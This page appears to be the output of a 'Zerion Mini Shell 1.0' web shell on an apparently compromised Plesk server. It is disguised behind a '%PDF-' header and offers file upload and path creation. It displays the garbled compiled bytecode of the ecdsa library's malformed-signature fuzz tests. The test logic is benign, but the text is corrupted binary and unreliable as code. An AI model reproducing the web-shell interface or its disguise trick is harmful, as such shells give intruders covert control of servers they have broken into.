%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/
Upload File :
Create Path :
Current File : //proc/self/root/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyc

�
�ac
@�s&ddlmZmZddlZyddlmZWn)ek
radddddd	gZnXdd
lmZddlZddl	Z	ddl
mZddlj
ZddlmZmZmZmZmZd
dlmZd
dlmZd
dlmZmZd
dlmZmZd
dlmZmZd
dlm Z m!Z!m"Z"m#Z#m$Z$m%Z%dZ&geD]Z'e'ej(e'�j)f^qnZ*gZ+x�e,edd��D]�Z-x�ge,e*dd��D]1\Z'Z.de.ko�e-j/knr�e'^q�D][Z0ej1e-deej(e0��Z2e+j3dj4e-e0�e2j5e2j6e&de�f�qWq�Wej7j8dge+D]'\Z'Z9Z:ej;e9e:de'�^qx�d��Z<ej=d��Z>iZ?e	j@d9krdd"lmAZAd#e?d$<eAjBeAjCeAjDge?d%<neEe?�ZFd&eFd'<ee?�ee>e+��d(���ZGej=d)��ZHeeF�eeH��d*���ZId+�ZJej=d,��ZKd-�ZLd.�ZMej=d/��ZNd0�ZOee?�eejPe+�eO��d1���ZQee?�eejPe+�ejRd2d:��ee+de$e d�e d���ee+de$e d
�e d
��d4�ee+de$e d
�gd5��d6������ZSge+D]?\Z'Z5Z:e'e5ed7e5j-jTee:e5j-jT��f^q�ZUee?�ee>eU��d8���ZVdS(;i����(twith_statementtdivisionN(talgorithms_availabletmd5tsha1tsha224tsha256tsha384tsha512(tpartial(tbinary_type(tnotetassumetgiventsettingstexamplei(t
SigningKey(tBadSignatureError(t
sigencode_dertsigencode_string(t
sigdecode_dertsigdecode_string(tcurvestNIST256p(tencode_integertencode_bitstringtencode_octet_stringt
encode_oidtencode_sequencetencode_constructedssome data to signtkeycC�s|jS(N(tbaselen(tx((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyt<lambda>)tcC�s|dS(Ni((R ((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyR!+R"ithashfuncs{0} {1}t	sigencodesverifying_key,signaturetidcC�s"|j|tdt�st�dS(Nt	sigdecode(tverifytexample_dataRtAssertionError(t
verifying_keyt	signature((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyttest_signatures8scC�s�|tj|��\}}}tdj|��t|�}|tjtjdddt|�d�dt��}|j	�xt
|�D]
}||=q�Wtdj|��|r>|tjtjdddt|�d�tjdddd���}x*|j�D]\}}	||c|	N<qWtd	j|��n|tjdddt|���}
|tj
d
d��}||
 |||
}tdj|
|��t|�}t|p�|p�|�t||k�||fS(
s�
    Hypothesis strategy that generates pairs of VerifyingKey and malformed
    signatures created by fuzzing of a valid signature.
    sConfiguration: {0}t	min_valueit	max_valueituniquesRemove bytes: {0}i�s	xors: {0}tmax_sizeis%Inserted at position {0} bytes: {1!r}(tsttsampled_fromRtformatt	bytearraytliststintegerstlentTruetsorttreversedtdictionariestitemstbinarytbytesR(tdrawt
keys_and_sigstnameR*told_sigtsigt	to_removetitxorstvalt
insert_postinsert_data((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyt
st_fuzzed_sig@s4	"
	$	
ii(tHealthChecki�tdeadlinetsuppress_health_checki
tmax_examplesc	C�s<|\}}tjt��|j|tdt�WdQXdS(NR&(tpytesttraisesRR'R(R(targsR*RC((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyttest_fuzzed_der_signatures}scC�s�|tjt��\}}}tdj|��t|jj�}|tjddd|d>�tjd|d?d|d�B�}|tjddd|d>�tjd|d?d|d�B�}t	t
|�t
|��}||fS(s�
    Hypothesis strategy for selecting random values and encoding them
    to ECDSA-Sig-Value object::

        ECDSA-Sig-Value ::= SEQUENCE {
            r INTEGER,
            s INTEGER
        }
    sConfiguration: {0}R-iR.iii(R1R2R@RR3tinttcurvetorderR6RR(R?RAR*t_RUtrtsRC((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pytst_random_der_ecdsa_sig_value�s$$c	C�s<|\}}tjt��|j|tdt�WdQXdS(sd
    Check if random values encoded in ECDSA-Sig-Value structure are rejected
    as signature.
    R&N(RORPRR'R(R(tparamsR*RC((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyttest_random_der_ecdsa_sig_value�scO�s5d|krd|d<ntjttj||��S(s�
    Hypothesis strategy that returns a random positive integer as DER
    INTEGER.
    Parameters are passed to hypothesis.strategy.integer.
    R-i(R1tbuildsRR6(RQtkwargs((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pytst_der_integer�s
cO�s|tj||��}|rl|tjdddd��}t|�}|dcd|M<t|�}nd}t||�S(s|
    Hypothesis strategy that returns a random DER BIT STRING.
    Parameters are passed to hypothesis.strategy.binary.
    R-iR.ii����i(R1R=R6R4R>R(R?RQR]tdatatunused((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pytst_der_bit_string�scO�stjttj||��S(s�
    Hypothesis strategy that returns a random DER OCTET STRING object.
    Parameters are passed to hypothesis.strategy.binary
    (R1R\RR=(RQR]((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pytst_der_octet_string�scC�s
tjd�S(s;
    Hypothesis strategy that returns DER NULL object.
    s(R1tjust(((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pytst_der_null�scC�s�|tjdddd��}|dkrK|tjdddd��}n|tjdddd	��}|tjtjdddd
�dd��}t|||�S(sI
    Hypothesis strategy that returns DER OBJECT IDENTIFIER objects.
    R-iR.ii'iR0i2l#l#(R1R6R5R(R?tfirsttsecondtrest((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyt
st_der_oid�s!!cC�sWtjtjd�tdd
�Btdd�Btdd�Bt�Bt�Bd�dd	�S(
s�
    Hypothesis strategy that returns random DER structures.

    A valid DER structure is any primitive object, an octet encoding
    of a valid DER structure, sequence of valid DER objects or a constructed
    encoding of any of the above.
    R"R.iiR0icS�s�tjd�tj|��tjd�tj|��Btjd�tj|dd��Btjd�tjddd	d
�tj|��BS(NcS�s
t|�S(N(R(R ((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyR!�R"cS�s
t|d�S(Ni(R(R ((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyR!�R"cS�s
t|�S(N(R(R ((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyR!�R"R0i�cS�s
t||�S(N(R(ttagR ((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyR!�sR-iR.i?(R1R\tone_ofR5R6(tchildren((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyR!�sYt
max_leavesi(lii(R1t	recursiveRcR^RaRbRdRh(((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pytst_der�sA		c	C�s?|\}}}tjt��|j|tdt�WdQXdS(s8Check if random DER structures are rejected as signatureR&N(RORPRR'R(R(RZtderRAR*RV((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyttest_random_der_as_signaturesR0isic	C�s?|\}}}tjt��|j|tdt�WdQXdS(s/Check if random bytes are rejected as signatureR&N(RORPRR'R(R(RZRoRAR*RV((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyttest_random_bytes_as_signatures
RUc	C�s<|\}}tjt��|j|tdt�WdQXdS(NR&(RORPRR'R(R(RZR*RC((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyttest_fuzzed_string_signatures,s(iii(Wt
__future__RRthashlibRtImportErrort	functoolsR	ROtsystsixR
thypothesis.strategiest
strategiesR1t
hypothesisRRR
RRtkeysRRtutilRRRRRRRoRRRRRRR(RAtnewtdigest_sizet
hash_and_sizeR@tsortedRTtsizeRthash_algtgeneratetsktappendR3R*tsigntmarktparametrizetvkRCtparamR,t	compositeRJRZtversion_infoRKtdata_too_largetfilter_too_muchttoo_slowtdicttslow_paramsRRRYR[R^RaRbRdRhRnR2RpR=RqRUtkeys_and_string_sigsRr(((sN/opt/plesk/python/2.7/lib/python2.7/site-packages/ecdsa/test_malformed_sigs.pyt<module>s�
(.(/!	@/

							'		!1
I	

Zerion Mini Shell 1.0